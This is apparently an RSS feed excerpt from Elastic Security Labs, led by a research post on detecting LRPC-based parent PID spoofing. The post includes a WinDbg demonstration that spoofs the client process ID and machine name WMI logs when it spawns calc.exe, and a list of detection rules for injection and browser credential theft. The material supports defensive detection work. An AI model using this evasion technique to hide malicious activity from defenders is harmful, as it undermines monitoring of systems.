<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image5.jpg" alt="" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image10.jpg" alt="" /></p>
<h2>Conclusion</h2>
<p>While this capability gives us a lead over the cutting edge of in-memory tradecraft today, attackers will no doubt develop <a href="https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs">new innovations</a> in attempts to evade it. That’s why we are already hard at work to deliver the next set of leading in-memory detections. Stay tuned!</p>
<h2>Resources</h2>
<p>Rules released with 8.8:</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_execution_from_a_macro_enabled_office_document.toml">Execution from a Macro Enabled Office Document</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_suspicious_macro_execution_via_windows_scripts.toml">Suspicious Macro Execution via Windows Scripts</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_suspicious_file_dropped_by_a_macro_enabled_document.toml">Suspicious File Dropped by a Macro Enabled Document</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_shortcut_file_modification_via_macro_enabled_document.toml">Shortcut File Modification via Macro Enabled Document</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_dll_loaded_from_a_macro_enabled_document.toml">DLL Loaded from a Macro Enabled Document</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_process_creation_via_microsoft_office_add_ins.toml">Process Creation via Microsoft Office Add-Ins</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/persistence_registry_or_file_modification_from_suspicious_memory.toml">Registry or File Modification from Suspicious Memory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_access_to_browser_credentials_from_suspicious_memory.toml">Access to Browser Credentials from Suspicious Memory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_ntdll_memory_unhooking.toml">Potential NTDLL Memory Unhooking</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_microsoft_common_language_runtime_loaded_from_suspicious_memory.toml">Microsoft Common Language Runtime Loaded from Suspicious Memory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_common_language_runtime_loaded_via_an_unsigned_module.toml">Common Language Runtime Loaded via an Unsigned Module</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_masquerading_as_windows_error_manager.toml">Potential Masquerading as Windows Error Manager</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_image_load_via_ldrloaddll.toml">Suspicious Image Load via LdrLoadDLL</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_library_loaded_via_a_callback_function.toml">Library Loaded via a CallBack Function</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_process_creation_from_modified_ntdll.toml">Process Creation from Modified NTDLL</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_dll_side_loading_via_a_copied_microsoft_executable.toml">DLL Side Loading via a Copied Microsoft Executable</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_injection_via_the_console_window_class.toml">Potential Injection via the Console Window Class</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_unsigned_dll_loaded_by_a_trusted_process.toml">Suspicious Unsigned DLL Loaded by a Trusted Process</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_process_stared_via_remote_thread.toml">Process Started via Remote Thread</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_injection_via_dotnet_debugging.toml">Potential Injection via DotNET Debugging</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_process_creation_via_shellcode.toml">Potential Process Creation via ShellCode</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_module_stomping_form_a_copied_library.toml">Module Stomping form a Copied Library</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_process_creation_from_a_stomped_module.toml">Process Creation from a Stomped Module</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_parallel_ntdll_loaded_from_unbacked_memory.toml">Parallel NTDLL Loaded from Unbacked Memory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_operation_via_direct_syscall.toml">Potential Operation via Direct Syscall</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_process_creation_via_direct_syscall.toml">Potential Process Creation via Direct Syscall</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_process_from_archive_or_removable_media_via_unbacked_code.toml">Process from Archive or Removable Media via Unbacked Code</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_network_module_loaded_from_suspicious_unbacked_memory.toml">Network Module Loaded from Suspicious Unbacked Memory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_rundll32_or_regsvr32_loaded_a_dll_from_unbacked_memory.toml">Rundll32 or Regsvr32 Loaded a DLL from Unbacked Memory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_windows_console_execution_from_unbacked_memory.toml">Windows Console Execution from Unbacked Memory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_process_creation_from_unbacked_memory_via_unsigned_parent.toml">Process Creation from Unbacked Memory via Unsigned Parent</a></li>
</ul>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/blog-thumb-coin-stacks.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Effective Parenting - detecting LRPC-based parent PID spoofing]]></title>
            <link>https://www.elastic.co/kr/security-labs/effective-parenting-detecting-lrpc-based-parent-pid-spoofing</link>
            <guid>effective-parenting-detecting-lrpc-based-parent-pid-spoofing</guid>
            <pubDate>Wed, 29 Mar 2023 00:00:00 GMT</pubDate>
            <description><![CDATA[Using process creation as a case study, this research will outline the evasion-detection arms race to date, describe the weaknesses in some current detection approaches and then follow the quest for a generic approach to LRPC-based evasion.]]></description>
            <content:encoded><![CDATA[<p>Adversaries currently utilize <a href="https://docs.microsoft.com/en-us/windows/win32/rpc/">RPC</a>’s client-server architecture to obfuscate their activities on a host – including <a href="https://docs.microsoft.com/en-us/windows/win32/com/com-technical-overview#remoting">COM</a> and <a href="https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture">WMI</a> which are both RPC-based. For example, a number of local RPC servers will happily launch processes on behalf of a malicious client - and that form of defense evasion is difficult to flag as malicious without being able to correlate it with the client.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image23.jpg" alt="Annotated process tree showing the breaks in the behaviour graph" /></p>
<p>The above annotated screenshot is the logical process tree after a Microsoft Word macro called three COM objects, each exposing a <code>ShellExecute</code> interface and also the WMI <code>Win32\_Process::Create</code> method. The WMI call has specialized telemetry that can reconstruct that Microsoft Word initiated the process creation (the blue arrow), but the COM calls don’t (the red arrows). So defenders have no visibility that Microsoft Word made a COM call over an RPC call to spawn PowerShell elsewhere on the system.</p>
<p>The defender is left with a challenge to interpretation because of this lack of context - Word spawning PowerShell is a red flag, but is <em>Explorer</em> spawning PowerShell malicious, or simply user behavior?</p>
<p>RPC will typically use <a href="https://learn.microsoft.com/en-us/windows/win32/rpc/selecting-a-protocol-sequence">LRPC</a> as the transport for inter-process communication. Using process creation as a case study, this research will outline the evasion-detection arms race to date, describe the weaknesses in some current detection approaches and then follow the quest for a generic approach to LRPC-based evasion.</p>
<h2>A Brief History of Child Process Evasion</h2>
<p>It is often very beneficial for adversaries to spawn child processes during intrusions. Using legitimate pre-installed system tools to achieve your aims saves on capability development time and can potentially evade security instrumentation by providing a veneer of legitimacy for the activity.</p>
<p>However, for the activity to look plausibly legitimate, the parent process also needs to seem plausible. The classic counter-example is that Microsoft Word spawning PowerShell is highly anomalous. In fact, Elastic SIEM includes a prebuilt rule to detect <a href="https://www.elastic.co/kr/guide/en/security/current/suspicious-ms-office-child-process.html">suspicious MS Office child processes</a> and Elastic Endpoint will also <a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_powershell_obfuscation_spawned_via_microsoft_office.toml">prevent malicious execution</a>. As documented in the Elastic <a href="https://www.elastic.co/kr/explore/security-without-limits/global-threat-report">Global Threat Report</a>, suspicious parent/child relationships was one of the three most common defense evasion techniques used by threats in 2022.</p>
<p>Endpoint Protection Platform (EPP) products could prevent the most egregious process parent relationships, but it was the rise of Endpoint Detection and Response (EDR) approaches with pervasive process start logging and the ability to retrospectively hunt that established a scalable approach to anomalous process tree detection.</p>
<p>Adversaries initially pivoted to evasions using a <a href="https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/">Win32 API feature introduced in Windows Vista</a> to support User Account Control (UAC) that allows a process to specify a different logical parent process to the real calling process. However, <a href="https://blog.f-secure.com/detecting-parent-pid-spoofing/">endpoint security could still identify the real parent process</a> based on the calling process context during the <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreateprocessnotifyroutine">process creation notification callback</a>, and <a href="https://www.elastic.co/kr/guide/en/security/current/parent-process-pid-spoofing.html">detection rule</a> coverage was quickly re-established.</p>
<p>New evasion techniques evolved in response, and a common method currently leveraged by adversaries is to indirectly spawn child processes via RPC – including <a href="https://docs.microsoft.com/en-us/windows/win32/com/com-technical-overview#remoting">DCOM</a> and <a href="https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture">WMI</a> which are both RPC-based. RPC can be either inter-host or simply inter-process. The latter is oxymoronically called Local Remote Procedure Call (LRPC).</p>
<p>The most well-known of these was the <a href="https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/create-method-in-class-win32-process"><code>Win32\_Process::Create</code></a> WMI method. In order to detect this, Microsoft appears to have explicitly added a new <a href="https://github.com/jdu2600/Windows10EtwEvents/blame/master/manifest/Microsoft-Windows-WMI-Activity.tsv"><code>Microsoft-Windows-WMI-Activity</code></a> ETW event in Windows 10 1809. The new event 23 included the client process id - the missing data point needed to associate the activity with a requesting client.</p>
<p>Unfortunately adversaries were quickly able to pivot to alternate process spawning out-of-process RPC servers such as <a href="https://learn.microsoft.com/en-us/previous-versions/windows/desktop/mmc/view-executeshellcommand"><code>MMC20.Application::ExecuteShellCommand</code></a>. Waiting for Microsoft to add telemetry to dual-purpose out-of-process RPC servers <a href="https://en.wikipedia.org/wiki/Whac-A-Mole">one-by-one</a> wasn’t going to be a viable detection approach, so last year we set out on a side quest to generically associate LRPC server actions with the requesting LRPC client process.</p>
<h2>Detecting LRPC provenance</h2>
<p>The majority of previous public RPC telemetry research has focused on inter-host lateral movement – typically spawning a process on a remote host. For example: - <a href="https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/">Lateral Movement using the MMC20.Application COM Object</a>- <a href="https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/">Lateral Movement via DCOM: Round 2</a>- <a href="https://blog.f-secure.com/endpoint-detection-of-remote-service-creation-and-psexec/">Endpoint Detection of Remote Service Creation and PsExec</a> - <a href="https://posts.specterops.io/utilizing-rpc-telemetry-7af9ea08a1d5">Utilizing RPC Telemetry</a>- <a href="https://www.elastic.co/kr/blog/hunting-for-lateral-movement-using-event-query-language">Detecting Lateral Movement techniques with Elastic</a> - <a href="https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/">Stopping Lateral Movement via the RPC Firewall</a></p>
<p>The ultimate advice for defenders is typically to monitor RPC network traffic for anomalies or, better yet, to block unnecessary remote access to RPC interfaces with <a href="https://www.akamai.com/blog/security/guide-rpc-filter">RPC Filters</a> (part of the <a href="https://learn.microsoft.com/en-us/windows/win32/fwp/">Windows Filtering Platform</a>) or specific RPC methods with 3rd party tooling like <a href="https://github.com/zeronetworks/rpcfirewall">RPC Firewall</a>.</p>
<p>Unfortunately these approaches don’t work when the adversary uses RPC to spawn a process elsewhere on the same host. In this case, the RPC transport is typically <a href="https://learn.microsoft.com/en-us/windows/win32/etw/alpc">ALPC</a> - monitoring and filtering at the network layer does not then apply.</p>
<p>On the host, detection engineers typically look to leverage telemetry from the inbuilt Event Tracing (including EventLog) in the first instance. If this proves insufficient, then they can investigate custom approaches such as user-mode function hooking or mini-filter drivers.</p>
<p>In the RPC case, <a href="https://github.com/jdu2600/Windows10EtwEvents/blob/master/manifest/Microsoft-Windows-RPC.tsv"><code>Microsoft-Windows-RPC</code></a> ETW events are very useful for identifying anomalous behaviours.</p>
<p>Especially: - Event 5 - <code>RpcClientCallStart</code> (GUID InterfaceUuid, UInt32 ProcNum, UInt32 Protocol, UnicodeString NetworkAddress, UnicodeString Endpoint, UnicodeString Options, UInt32 AuthenticationLevel, UInt32 AuthenticationService, UInt32 ImpersonationLevel) - Event 6 - <code>RpcServerCallStart</code> (GUID InterfaceUuid, UInt32 ProcNum, UInt32 Protocol, UnicodeString NetworkAddress, UnicodeString Endpoint, UnicodeString Options, UInt32 AuthenticationLevel, UInt32 AuthenticationService, UInt32 ImpersonationLevel)</p>
<p>Additionally, <code>RpcClientCallStart</code> is generated by the client and <code>RpcServerCallStart</code> by the server so the ETW headers will provide the client and server process ids respectively. Further, there is a 1:1 mapping between endpoint addresses and server process ids. So the server process can be inferred from the <code>RpcClientCallStart</code> event.</p>
<p>The RPC interface UUID and Procedure number combined with the caller details are (usually) sufficient to identify intent. For example, RPC interface UUID <code>{367ABB81–9844–35F1-AD32–98F038001003}</code> is the Service Control Manager Remote Protocol which exposes the ability to configure Windows services. The 12th procedure in this interface is <code>RCreateServiceW</code> which notoriously is the method that PsExec uses to execute processes on remote systems.</p>
<p>For endpoint security vendors, however, there are a few issues to address before scalable robust <code>Microsoft-Windows-RPC</code> detections would be possible: 1. RPC event volumes are significant 2. There isn't an obvious mechanism to strongly correlate a client call with the resultant server call 3. There isn’t an obvious mechanism to strongly correlate a server call with the resultant server behavior</p>
<p>Let’s address these three issues one by one.</p>
<h3>LRPC event volumes</h3>
<p>There are thousands of LRPC events each second – and most of them are uninteresting. To address the LRPC event volume concern, we could limit the events to just those RPC events that are inter-process (including inter-host). However, this immediately leads to the second concern. We need to identify the client of each server call in order to reduce event volumes down to just those which are inter-process.</p>
<h3>Correlating RPC server calls with their clients</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image7.jpg" alt="Annotated MSDN RPC architecture" /></p>
<p>Modern Windows RPC has roughly three <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/472083a9-56f1-4d81-a208-d18aef68c101">transports</a>: - TCP/IP (nacn_ip_tcp, nacn_http, ncadg_ip_udp and nacn_np over SMB) - inter-process Named Pipes (direct nacn_np) - inter-process ALPC (ncalrpc)</p>
<p>The <code>RpcServerCallStart</code> event alone is not sufficient to determine if the call was inter-process. It needs to be correlated against a preceding <code>RpcCientCallStart</code> event, and <a href="https://stackoverflow.com/questions/41504738/how-to-correlate-rpc-calls-in-etw-traces">this correlation</a> is unfortunately weak. At best you can identify a pair of <code>RpcServerCall</code> start/stop events that are bracketed by a pair of <code>RpcClientCall</code> events with the same parameters. (Note - for performance reasons, ETW events generated from different threads may arrive out of order). This means that you need to maintain a holistic RPC state - which creates an on-host storage and processing volume concern in order to address the event volume concern.</p>
<p>More importantly though, the <code>RpcClientCallStart</code> events are generated in the client process where an adversary has already achieved execution and therefore can be <a href="https://twitter.com/dez_/status/938074904666271744">intercepted with very little effort</a>. There is little point to implementing a detection for something so trivial to circumvent, especially when there are more effective options.</p>
<p>Ideally, the RPC server would access the client details and directly log this information. Unfortunately, the ETW events don’t include this information - which is not surprising since one of the RPC design goals was simplification through abstraction. The RPC runtime (allegedly) can be configured via Group Policy to do exactly this, though. It can store <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/enabling-rpc-state-information">RPC State Information</a> which can then be used during debugging to <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/identifying-the-caller-from-the-server-thread">identify the client caller from the server thread</a>. Unfortunately the Windows XP era documentation didn’t immediately work for Windows 10.</p>
<p>It did provide a rough outline describing how to address the first two problems: reducing event volumes and correlating server calls to client processes. It is possible to hook the RPC runtime in all RPC servers, account for the various transports, and then log or filter inter-process RPC events only. (This is likely akin to how <a href="https://github.com/zeronetworks/rpcfirewall">RPC Firewall</a>handles network RPC - just with local endpoints).</p>
<h3>Correlating RPC server calls and resultant behavior</h3>
<p>The next problem was how to correctly attribute a specific server call to the resultant server behaviour. On a busy server, how could we tie an opaque call to the <code>ExecuteShellCommand</code> method to a specific process creation event? And what if the call came from script-based malware and was further wrapped under a method like <a href="https://learn.microsoft.com/en-us/windows/win32/api/oaidl/nf-oaidl-idispatch-invoke"><code>IDispatch::Invoke</code></a>?</p>
<p>We didn’t want to have to inspect the RPC parameter blob and individually implement parsing support for each abusable RPC method.</p>
<h4>Introducing ETW’s ActivityId</h4>
<p>Thankfully, Microsoft had already thought of this scenario and <a href="https://docs.microsoft.com/en-us/archive/msdn-magazine/2007/april/event-tracing-improve-debugging-and-performance-tuning-with-etw">provides ETW tracing guidance</a> to developers.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image17.png" alt="Annotated MSDN documentation for EventWriteEx" /></p>
<p>They suggest that developers generate and propagate a unique 128-bit <code>ActivityId</code> between related ETW events to enable end-to-end tracing scenarios. This is typically handled automatically by ETW for events generated on the same thread as the value is stored in thread local storage. However, the developer must manually propagate this ID to related activities performed by other threads… or processes. As long as the RPC Runtime and all Microsoft RPC servers had followed ETW tracing best practices, we should finally have the end-to-end correlation we want!</p>
<p>It was time to break out a decompiler (we like Ghidra but there are many options) and inspect rpcrt4.dll. By looking at the first parameter passed to <a href="https://learn.microsoft.com/en-us/windows/win32/api/evntprov/nf-evntprov-eventregister"><code>EventRegister</code></a> calls, we can see that there are three ETW GUIDs in the RPC runtime. These GUIDs are defined in a contiguous block and helpfully came with public symbols.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image5.jpg" alt="" /></p>
<p>These GUIDs correspond to <a href="https://github.com/jdu2600/Windows10EtwEvents/blob/086d88e58d6e063868ec62a10f9e1b33e8694735/manifest/Microsoft-Windows-RPC.tsv"><code>Microsoft-Windows-RPC</code></a>, <a href="https://github.com/jdu2600/Windows10EtwEvents/blob/086d88e58d6e063868ec62a10f9e1b33e8694735/manifest/Microsoft-Windows-Networking-Correlation.tsv"><code>Microsoft-Windows-Networking-Correlation</code></a> and <a href="https://github.com/jdu2600/Windows10EtwEvents/blob/086d88e58d6e063868ec62a10f9e1b33e8694735/manifest/Microsoft-Windows-RPC-Events.tsv"><code>Microsoft-Windows-RPC-Events</code></a> respectively. Further, the RPC runtime helpfully wraps calls to <code>EventWrite</code> in just two places.</p>
<p>The first call is in <code>McGenEventWrite\_EtwEventWriteTransfer</code> and looks like this:</p>
<pre><code>`EtwEventWriteTransfer` (RegHandle, EventDescriptor, NULL, NULL, UserDataCount, UserData);
</code></pre>
<p>The NULL parameters mean that <code>ActivityId</code> will always be the configured per-thread <code>ActivityId</code> and <code>RelatedActivityId</code> will always be excluded in events logged by this code path.</p>
<p>The second call is in <code>EtwEx\_tidActivityInfoTransfer</code> and looks like this:</p>
<pre><code>`EtwEventWriteTransfer` (Microsoft_Windows_Networking_CorrelationHandle, EventDescriptor, ActivityId, RelatedActivityId, UserDataCount, UserData);
</code></pre>
<p>This means that <code>RelatedActivityId</code> will only ever be logged in <code>Microsoft-Windows-Networking-Correlation</code> events. RPC Runtime <code>ActivityId</code> s are (predominantly) created within a helper function that ensures that this correlation is always logged.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image14.jpg" alt="Ghidra decompilation for RPC ActivityId creation" /></p>
<p>Decompilation also revealed that the RPC runtime allocates ETW <code>ActivityId</code> s by calling <code>UuidCreate</code> , which generates a random 128-bit value. This is done in locations such as <code>NdrAysncClientCall</code> and <code>HandleRequest</code>. In other words, the client and server both individually allocate <code>ActivityId</code> s. This isn’t unsurprising because the DCE/RPC specification doesn’t seem to include a transaction id or similar construct which would allow the client to propagate an ActivityId to the server. That’s okay though: we’re only currently missing the correlation between server call and the resultant behaviour. Also we don’t want to trust any potentially tainted client-supplied information.</p>
<p>So now we know exactly how RPC intends to correlate activities triggered by RPC calls- by setting the per-thread ETW <code>ActivityId</code> and by logging RPC ActivityId correlations to <code>Microsoft-Windows-Networking-Correlation</code>. The next question is whether the Microsoft RPC interfaces that support dual-purpose activities, such as process spawning, propagate the <code>ActivityId</code> appropriately.</p>
<p>We looked at the execution traces for the four indirect process creation examples from our initial case study. In each one, the RPC request was received on one thread, a second thread handled the request and a third thread spawned the process. Other than the timing, there appeared to be no possible mechanism to link the activities.</p>
<p>Unfortunately, while the RPC subsystem is well behaved, most RPC servers aren't – though this likely isn't entirely their fault. The <code>ActivityId</code> is only preserved per-thread so if the server uses a worker thread pool (as per Microsoft’s <a href="https://learn.microsoft.com/en-us/windows/win32/rpc/scalability">RPC scalability</a> advice) then the causality correlation is implicitly broken.</p>
<p>Further, kernel ETW events seem to universally log an <code>ActivityId</code> of <code>{00000000-0000-0000-0000-000000000000}</code> – even when the thread has a (user-mode) <code>ActivityId</code> configured. It is likely that the kernel implementation of <code>EtwWriteEvent</code> simply does not query the <code>ActivityId</code> which is stored in user-mode thread local storage.</p>
<p>This observation about kernel events is a showstopper for a generic approach based around ETW. Almost all of the interesting resultant server behaviors (process, registry, file etc) are logged by kernel ETW events.</p>
<p>A new approach was necessary. It isn’t scalable to investigate individual ETW providers in dual-purpose RPC servers. (Though the <code>Microsoft.Windows.ShellExecute</code> TraceLogging provider looked interesting). What would Microsoft do?</p>
<h3>What would Microsoft do?</h3>
<p>More specifically, how does Microsoft populate the <code>ClientProcessId</code> in the <code>Microsoft-Windows-WMI-Activity</code> ETW event 23 (aka <code>Win32\_Process::Create</code> )?</p>
<pre><code>`task_023` (UnicodeString CorrelationId, UInt32 GroupOperationId, UInt32 OperationId, UnicodeString Commandline, UInt32 CreatedProcessId, UInt64 CreatedProcessCreationTime, UnicodeString ClientMachine, UnicodeString ClientMachineFQDN, UnicodeString User, UInt32 ClientProcessId, UInt64 ClientProcessCreationTime, Boolean IsLocal)
</code></pre>
<p>Unlike RPC, WMI natively supports end-to-end tracing via a <code>CorrelationId</code> which is a GUID that the WMI client passes to the server at the WMI layer so that WMI operations can be associated. However, for security use cases, we shouldn’t blindly trust client-supplied information for reasons previously mentioned.</p>
<p>But how was Microsoft determining the process id to log and was their approach something that could be replicated for other RPC Servers – possibly via an RPC server runtime hook?</p>
<p>We needed to find out where the data in that field came from. ETW conveniently provides the ability to record a stack trace when an event is generated and the <a href="https://github.com/pathtofile/Sealighter">Sealighter</a> tool conveniently exposes this capability. Sealighter illustrates which specific ETW Write function is being called from which process.</p>
<p>In this case, the event was actually being written by <code>ntdll!EtwEventWrite</code> in the WMI Core Service (svchost.exe -k netsvcs -p -s Winmgmt) – not in the WMI Provider Host (WmiPrvSE.exe).</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image9.jpg" alt="" /></p>
<p>Putting a breakpoint on <code>PublishWin32ProcessCreation</code> , we see via parameter value inspection that the <code>ClientProcessId</code> is passed (on the stack) as the 10th parameter. We can then look at <code>InspectWin32ProcessCreateExecution</code> to determine how the value that is passed in is determined.</p>
<p>A roughly tidied Ghidra decompilation of <code>InspectWin32ProcessCreateExecution</code> might resemble this:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image1.jpg" alt="" /></p>
<p>We can see that the client process id comes from the <code>CWbemNamespace</code> object. Searching for reference to this structure field, we find that it is only set in <code>CWbemNamespace::Initialize</code>. Our earlier stack trace started in <code>wbemcore!CCoreQueue</code> and this initialization appears to have occurred prior to queuing. So we could statically search for all locations where the initialization occurs or dynamically observe the actual code paths taken.</p>
<p>We know that this activity is being initiated over RPC, so one approach would be to place breakpoints on RPC send/receive functions in the client and server. An alternative might be to fire up Wireshark and examine the packet capture of the entire interaction when it occurs in cleartext over the network. We learned somewhat late in our research that Microsoft had excellent documentation for the <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wmi/1106e73c-9a7c-4e25-9216-0a5d8e581d62">WMI Protocol Initialization</a> that explained much of this and might have saved a little time.</p>
<p>We took the first approach. The second parameter to <code>InspectWin32ProcessCreateExecution</code> is an <a href="https://docs.microsoft.com/en-us/windows/win32/api/wbemcli/nn-wbemcli-iwbemcontext"><code>IWbemContext</code></a> – which allows the caller to provide additional information to providers. This is how the parameters to <code>Win32\_Process::Create</code> are being passed. What if the first parameter was related to the WMI Client passing additional context to the WMI Core?</p>
<p><code>IWbemLevel1Login::NTLMLogin</code> stood out in the call traces as a good place to start looking.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image24.jpg" alt="" /></p>
<p>And right next to its COM interface UUID was IWbemLoginClientID[Ex] which had a very interesting <code>SetClientInfo</code> call, which was documented on MSDN:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image2.jpg" alt="" /></p>
<p>The WMI client calls <code>wbemprox!SetClientIdentity</code> which looks roughly like this:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image18.jpg" alt="" /></p>
<p><code>IWbemLoginClientIDEx</code> is currently undocumented, but we can infer the parameters from the values passed.</p>
<p>At this point, it looks like the client process is passing <code>ClientMachineName</code> , <code>ClientMachineFQDN</code> , <code>ClientProcessId</code> and <code>ClientProcessCreationTime</code> to the WMI Core. We can confirm this by changing the values and seeing if the ETW event logged by the WMI Core changes.</p>
<p>Using WinDbg, we set up a couple quick patches to the WMI client process and then spawned a process via WMI:</p>
<pre><code>windbg&gt; bp wbemprox!SetClientIdentity+0xff &quot;eu @rdx \&quot;SPOOFED....\&quot;; gc&quot;
windbg&gt; bp wbemprox!SetClientIdentity+0x1c4 &quot;r r9=0n1337; eu @r8 \&quot;SPOOFED.COM\&quot;; gc&quot;
PS&gt; ([wmiclass]&quot;ROOT\CIMv2:Win32_Process&quot;).Create(&quot;calc.exe&quot;)
</code></pre>
<p>Using SilkETW (or another ETW capture mechanism), we see the following event from the server process:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image12.jpg" alt="" /></p>
<p>The server is blindly reporting the values provided by the client. This means that this event cannot be relied upon for un-breaking WMI process provenance trees as the adversary can control the client process id. Falsely reporting this information would be an interesting defense evasion, and a tough one to identify reliably.</p>
<p>Further, a remote adversary can actually pass in a <code>ClientMachine</code> name equal to the local hostname and this WMI event will mistakenly log IsLocal as true. (See the earlier decompilation of <code>InspectWin32ProcessCreateExecution</code> ). This will make the event seem like a suspicious local execution rather than lateral movement, and represents another defence evasion opportunity.</p>
<p>So, this isn’t an approach that other RPC servers should follow after all.</p>
<h2>Conclusion</h2>
<p>In trying to generically solve LRPC provenance, we unfortunately demonstrate that the one existing LRPC provenance data point is unreliable. This has been reported to Microsoft where it was assessed as a next-version candidate bug that will be evaluated for future releases.</p>
<p>Our fervent hope is that the ultimate solution involves the creation of a documented API that allows a server LRPC thread to determine the client thread of a connection. This would provide endpoint security products with a reliable mechanism to identify operations being proxied through LRPC calls in an attempt to hide their origin.</p>
<p>More generally though, this research highlights the need for defenders to have a detailed understanding of data provenance. It is necessary but not sufficient to know that the data was logged by a trustworthy source such as the kernel or a server process. In addition, you must also understand whether the data was intrinsic to the event or provided by a potentially untrustworthy client. Otherwise adversaries will exploit the gaps.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/blog-thumb-sorting-colors.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Stopping Vulnerable Driver Attacks]]></title>
            <link>https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks</link>
            <guid>stopping-vulnerable-driver-attacks</guid>
            <pubDate>Wed, 01 Mar 2023 00:00:00 GMT</pubDate>
            <description><![CDATA[This post includes a primer on kernel mode attacks, along with Elastic’s recommendations for securing users from kernel attacks leveraging vulnerable drivers.]]></description>
            <content:encoded><![CDATA[<h2>Key takeaways</h2>
<ul>
